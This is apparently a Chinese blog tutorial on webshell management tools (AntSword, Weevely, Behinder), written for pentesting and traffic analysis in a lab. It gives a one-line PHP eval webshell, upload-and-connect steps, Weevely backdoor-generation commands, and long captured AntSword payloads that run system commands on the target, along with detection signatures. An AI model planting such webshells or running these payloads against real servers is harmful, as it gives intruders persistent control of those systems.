Webshell管理工具

最新推荐文章于 2024-05-29 13:34:37 发布
最新推荐文章于 2024-05-29 13:34:37 发布
阅读量1.7w 收藏 13
点赞数 4
分类专栏: 渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59872639/article/details/122504488
版权

Webshell简介

  • Webshell是以ASP、PHP、 JSP或者CGI等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。
  • Webshell使用方法简单,只需上传-一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。
  • 正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。

 Webshell的作用

  • 一方面,Webshell常常被站长用于网站管理、服务器管理等,可以在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。
  • 另一方面,Webshell也常 常被入侵者利用,达到控制网站服务器的目的。这些网页脚本常称为Web脚本木马,比较流行主要是ASP或PHP木马,也有基于.NET的脚本木马与JSP脚本木马。国内常用的Webshell有海阳ASP木马、Phpspy、c99shell等。

Webshell管理工具

  • Webshell管理工具,即用来管理Webshell的工具,其功能类似于木马的控制端程序,它集成了许多实用的小工具,方便攻击者对Webshell进行管理。
  • 常见的Webshell管理工具有蚁剑(AntSword)、冰蝎(Behinder) 、Weevely等。

中国蚁剑

中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具。

中国蚁剑的核心功能

  • Shell代理功能
  • Shell管理
  • 文件管理
  • 虚拟终端
  • 数据库管理
  • 插件市场
  • 插件开发

中国蚁剑的简单使用

环境需求

  • windows攻击机,装有蚁剑
  • windows靶机,有phpstudy环境

步骤1:写一个简单的一句话木马

<?php @eval($_POST['123456']); ?>

关于一句话木马可以看我之前的博客:使用PHP制作简单的一句话木马与PHP中文乱码问题_.SYS.的博客-CSDN博客_php写一句话木马

步骤2:将一句话木马上传至靶机的服务器根目录

步骤3:打开中国蚁剑,右键添加数据

 步骤4:配置好数据信息,测试连接

 步骤5:双击添加的数据,可以查看靶机的所有的盘符信息。

 右键可以打开虚拟终端

 中国蚁剑的流量解密及分析

使用Wireshark抓取蚁剑数据包

 追踪HTTP流开始流量分析

 不加密

POST /shell.php HTTP/1.1

Host: 192.168.4.229

Accept-Encoding: gzip, deflate

User-Agent: antSword/v2.1

Content-Type: application/x-www-form-urlencoded

Content-Length: 988

Connection: close

123=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%22546a1e%22%3Becho%20%40asenc(%24output)%3Becho%20%226786a4e%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3BHTTP/1.1 200 OK

Date: Fri, 14 Jan 2022 07:18:25 GMT

Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02

X-Powered-By: PHP/7.3.4

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html; charset=UTF-8

546a1eD:/phpstudy_pro/WWW C:D: Windows NT DESKTOP-HF3Q4QD 10.0 build 19043 (Windows 10) AMD64 DELL6786a4e

使用URL解码后

<?php
123=@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out){return $out;};
function asoutput(){$output=ob_get_contents();
ob_end_clean();echo "546a1e";
echo @asenc($output);
echo "6786a4e";
}ob_start();
try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D}	";
if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";
}else{$R.="/";}$R.="	";
$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
$s=($u)?$u["name"]:@get_current_user();
$R.=php_uname();$R.="	{$s}";
echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};
asoutput();die();

 也可以使用Base64加解密方式进行数据加解密

 POST /shell.php HTTP/1.1

Host: 192.168.4.229

Accept-Encoding: gzip, deflate

User-Agent: antSword/v2.1

Content-Type: application/x-www-form-urlencoded

Content-Length: 1036

Connection: close

123=%40eval(%40base64_decode(%24_POST%5Bqdf3b71771ac14%5D))%3B&qdf3b71771ac14=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuIEBiYXNlNjRfZW5jb2RlKCRvdXQpO307ZnVuY3Rpb24gYXNvdXRwdXQoKXskb3V0cHV0PW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO2VjaG8gImFkMmI1NmYiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gImY1NzUyYWE3YiI7fW9iX3N0YXJ0KCk7dHJ5eyREPWJhc2U2NF9kZWNvZGUoJF9QT1NUWyJ5ZWRjZDE1NjdlMTA4MSJdKTskRj1Ab3BlbmRpcigkRCk7aWYoJEY9PU5VTEwpe2VjaG8oIkVSUk9SOi8vIFBhdGggTm90IEZvdW5kIE9yIE5vIFBlcm1pc3Npb24hIik7fWVsc2V7JE09TlVMTDskTD1OVUxMO3doaWxlKCROPUByZWFkZGlyKCRGKSl7JFA9JEQuJE47JFQ9QGRhdGUoIlktbS1kIEg6aTpzIixAZmlsZW10aW1lKCRQKSk7QCRFPXN1YnN0cihiYXNlX2NvbnZlcnQoQGZpbGVwZXJtcygkUCksMTAsOCksLTQpOyRSPSIJIi4kVC4iCSIuQGZpbGVzaXplKCRQKS4iCSIuJEUuIgoiO2lmKEBpc19kaXIoJFApKSRNLj0kTi4iLyIuJFI7ZWxzZSAkTC49JE4uJFI7fWVjaG8gJE0uJEw7QGNsb3NlZGlyKCRGKTt9O31jYXRjaChFeGNlcHRpb24gJGUpe2VjaG8gIkVSUk9SOi8vIi4kZS0%2BZ2V0TWVzc2FnZSgpO307YXNvdXRwdXQoKTtkaWUoKTs%3D&yedcd1567e1081=RDovcGhwc3R1ZHlfcHJvL1dXVy8%3DHTTP/1.1 200 OK

Url解码后

123=@eval(@base64_decode($_POST[qdf3b71771ac14]));&qdf3b71771ac14=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuIEBiYXNlNjRfZW5jb2RlKCRvdXQpO307ZnVuY3Rpb24gYXNvdXRwdXQoKXskb3V0cHV0PW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO2VjaG8gImFkMmI1NmYiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gImY1NzUyYWE3YiI7fW9iX3N0YXJ0KCk7dHJ5eyREPWJhc2U2NF9kZWNvZGUoJF9QT1NUWyJ5ZWRjZDE1NjdlMTA4MSJdKTskRj1Ab3BlbmRpcigkRCk7aWYoJEY9PU5VTEwpe2VjaG8oIkVSUk9SOi8vIFBhdGggTm90IEZvdW5kIE9yIE5vIFBlcm1pc3Npb24hIik7fWVsc2V7JE09TlVMTDskTD1OVUxMO3doaWxlKCROPUByZWFkZGlyKCRGKSl7JFA9JEQuJE47JFQ9QGRhdGUoIlktbS1kIEg6aTpzIixAZmlsZW10aW1lKCRQKSk7QCRFPXN1YnN0cihiYXNlX2NvbnZlcnQoQGZpbGVwZXJtcygkUCksMTAsOCksLTQpOyRSPSIJIi4kVC4iCSIuQGZpbGVzaXplKCRQKS4iCSIuJEUuIgoiO2lmKEBpc19kaXIoJFApKSRNLj0kTi4iLyIuJFI7ZWxzZSAkTC49JE4uJFI7fWVjaG8gJE0uJEw7QGNsb3NlZGlyKCRGKTt9O31jYXRjaChFeGNlcHRpb24gJGUpe2VjaG8gIkVSUk9SOi8vIi4kZS0+Z2V0TWVzc2FnZSgpO307YXNvdXRwdXQoKTtkaWUoKTs=&yedcd1567e1081=RDovcGhwc3R1ZHlfcHJvL1dXVy8=

Base64流量解密

Base64解码
<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out)
{return @base64_encode($out);};
function asoutput()
{$output=ob_get_contents();
ob_end_clean();
echo "ad2b56f";
echo @asenc($output);
echo "f5752aa7b";
}ob_start();
try{$D=base64_decode($_POST["yedcd1567e1081"]);    //base64的路径
$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");   打开路径,不存在就报错报错

执行ipconfig流量特征

在虚拟终端中执行ipconfig命令

 POST /1.php HTTP/1.1
Host: 192.168.147.132
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 4029
Connection: close

123456=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%222128a7e59%22%3Becho%20%40asenc(%24output)%3Becho%20%2294639%22%3B%7Dob_start()%3Btry%7B%24p%3Dbase64_decode(%24_POST%5B%22ff7659052dae3%22%5D)%3B%24s%3Dbase64_decode(%24_POST%5B%22if34e82746af23%22%5D)%3B%24envstr%3D%40base64_decode(%24_POST%5B%22rd6ea77c0d0469%22%5D)%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24c%3Dsubstr(%24d%2C0%2C1)%3D%3D%22%2F%22%3F%22-c%20%5C%22%7B%24s%7D%5C%22%22%3A%22%2Fc%20%5C%22%7B%24s%7D%5C%22%22%3Bif(substr(%24d%2C0%2C1)%3D%3D%22%2F%22)%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3A%2Fusr%2Flocal%2Fsbin%3A%2Fusr%2Flocal%2Fbin%3A%2Fusr%2Fsbin%3A%2Fusr%2Fbin%3A%2Fsbin%3A%2Fbin%22)%3B%7Delse%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3BC%3A%2FWindows%2Fsystem32%3BC%3A%2FWindows%2FSysWOW64%3BC%3A%2FWindows%3BC%3A%2FWindows%2FSystem32%2FWindowsPowerShell%2Fv1.0%2F%3B%22)%3B%7Dif(!empty(%24envstr))%7B%24envarr%3Dexplode(%22%7C%7C%7Casline%7C%7C%7C%22%2C%20%24envstr)%3Bforeach(%24envarr%20as%20%24v)%20%7Bif%20(!empty(%24v))%20%7B%40putenv(str_replace(%22%7C%7C%7Caskey%7C%7C%7C%22%2C%20%22%3D%22%2C%20%24v))%3B%7D%7D%7D%24r%3D%22%7B%24p%7D%20%7B%24c%7D%22%3Bfunction%20fe(%24f)%7B%24d%3Dexplode(%22%2C%22%2C%40ini_get(%22disable_functions%22))%3Bif(empty(%24d))%7B%24d%3Darray()%3B%7Delse%7B%24d%3Darray_map('trim'%2Carray_map('strtolower'%2C%24d))%3B%7Dreturn(function_exists(%24f)%26%26is_callable(%24f)%26%26!in_array(%24f%2C%24d))%3B%7D%3Bfunction%20runshellshock(%24d%2C%20%24c)%20%7Bif%20(substr(%24d%2C%200%2C%201)%20%3D%3D%20%22%2F%22%20%26%26%20fe('putenv')%20%26%26%20(fe('error_log')%20%7C%7C%20fe('mail')))%20%7Bif%20(strstr(readlink(%22%2Fbin%2Fsh%22)%2C%20%22bash%22)%20!%3D%20FALSE)%20%7B%24tmp%20%3D%20tempnam(sys_get_temp_dir()%2C%20'as')%3Bputenv(%22PHP_LOL%3D()%20%7B%20x%3B%20%7D%3B%20%24c%20%3E%24tmp%202%3E%261%22)%3Bif%20(fe('error_log'))%20%7Berror_log(%22a%22%2C%201)%3B%7D%20else%20%7Bmail(%22a%40127.0.0.1%22%2C%20%22%22%2C%20%22%22%2C%20%22-bv%22)%3B%7D%7D%20else%20%7Breturn%20False%3B%7D%24output%20%3D%20%40file_get_contents(%24tmp)%3B%40unlink(%24tmp)%3Bif%20(%24output%20!%3D%20%22%22)%20%7Bprint(%24output)%3Breturn%20True%3B%7D%7Dreturn%20False%3B%7D%3Bfunction%20runcmd(%24c)%7B%24ret%3D0%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(fe('system'))%7B%40system(%24c%2C%24ret)%3B%7Delseif(fe('passthru'))%7B%40passthru(%24c%2C%24ret)%3B%7Delseif(fe('shell_exec'))%7Bprint(%40shell_exec(%24c))%3B%7Delseif(fe('exec'))%7B%40exec(%24c%2C%24o%2C%24ret)%3Bprint(join(%22%0A%22%2C%24o))%3B%7Delseif(fe('popen'))%7B%24fp%3D%40popen(%24c%2C'r')%3Bwhile(!%40feof(%24fp))%7Bprint(%40fgets(%24fp%2C2048))%3B%7D%40pclose(%24fp)%3B%7Delseif(fe('proc_open'))%7B%24p%20%3D%20%40proc_open(%24c%2C%20array(1%20%3D%3E%20array('pipe'%2C%20'w')%2C%202%20%3D%3E%20array('pipe'%2C%20'w'))%2C%20%24io)%3Bwhile(!%40feof(%24io%5B1%5D))%7Bprint(%40fgets(%24io%5B1%5D%2C2048))%3B%7Dwhile(!%40feof(%24io%5B2%5D))%7Bprint(%40fgets(%24io%5B2%5D%2C2048))%3B%7D%40fclose(%24io%5B1%5D)%3B%40fclose(%24io%5B2%5D)%3B%40proc_close(%24p)%3B%7Delseif(fe('antsystem'))%7B%40antsystem(%24c)%3B%7Delseif(runshellshock(%24d%2C%20%24c))%20%7Breturn%20%24ret%3B%7Delseif(substr(%24d%2C0%2C1)!%3D%22%2F%22%20%26%26%20%40class_exists(%22COM%22))%7B%24w%3Dnew%20COM('WScript.shell')%3B%24e%3D%24w-%3Eexec(%24c)%3B%24so%3D%24e-%3EStdOut()%3B%24ret.%3D%24so-%3EReadAll()%3B%24se%3D%24e-%3EStdErr()%3B%24ret.%3D%24se-%3EReadAll()%3Bprint(%24ret)%3B%7Delse%7B%24ret%20%3D%20127%3B%7Dreturn%20%24ret%3B%7D%3B%24ret%3D%40runcmd(%24r.%22%202%3E%261%22)%3Bprint%20(%24ret!%3D0)%3F%22ret%3D%7B%24ret%7D%22%3A%22%22%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&ff7659052dae3=Y21k&if34e82746af23=Y2QgL2QgIkM6XFxwaHBzdHVkeV9wcm9cXFdXVyImaXBjb25maWcmZWNobyBbU10mY2QmZWNobyBbRV0%3D&rd6ea77c0d0469=HTTP/1.1 200 OK
Date: Fri, 14 Jan 2022 16:14:57 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

第一个特征:

User-Agent: antSword/v2.1

第二个特征:

@ini_set("display_errors", "0");   其它会加密,蚁剑是明文的。

第三个特征

出现缓冲区的函数

第四个特征

Base64最后的一个字段解密是当前目录

Weevely简介

  • Weevely是-款Python编写的Webshell管理工具,它最大的优点在于跨平台,可以算作是Linux下的一款菜刀替代工具(限于PHP)
  • Kali Linux自带Weevely.

Weevely的基本命令 ——生成专用木马

weevely generate <password> <path>

 

Weevely的基本命令 ——远程连接木马或执行命令

weevely <url> <password> [cmd]

Weevely模块调用

连接木马成功后会得到shell,除了执行基础的系统命令,还可以输入help,调用weevely模块

file_ls:查看文件及目录

file_download:将远程目录下的文件下载到本地

 

Weevely 流量分析

以 system_info 为例

 

冰蝎哥斯拉的用法都类似,直接看流量分析

冰蝎3.0流量分析

 冰蝎自定义默认密码流量包

POST /shell.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Content-type: application/x-www-form-urlencoded
Referer: http://192.168.4.229/shell.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.4.229
Connection: keep-alive
Content-Length: 6252

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HTTP/1.1 200 OK
Date: Sat, 15 Jan 2022 02:22:29 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/7.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=kv8hmj5ack6dv9uiobhoaff176; path=/
Keep-Alive: timeout=5, max=100
